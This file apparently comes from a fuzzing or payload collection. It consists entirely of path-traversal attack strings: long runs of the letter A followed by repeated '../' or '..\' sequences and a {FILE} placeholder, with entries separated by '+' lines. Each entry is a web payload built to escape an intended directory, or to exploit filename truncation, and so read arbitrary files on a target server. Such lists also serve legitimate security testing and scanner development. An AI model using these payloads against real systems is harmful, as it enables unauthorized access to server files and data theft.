AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE}
 +
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../{FILE}
 +
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../{FILE}
 +
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../{FILE}
 +
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\{FILE}
 +
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\{FILE}
 +
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\{FILE}
 +
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\{FILE}
 +
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\{FILE}
 +
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\{FILE}
 +
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\{FILE}
 +
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\{FILE}
 +
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}
 +
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}
 +
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}
 +
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}
 +
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE}
 +
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../{FILE}
 +
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../{FILE}
 +
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../{FILE}
 +
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\{FILE}
 +
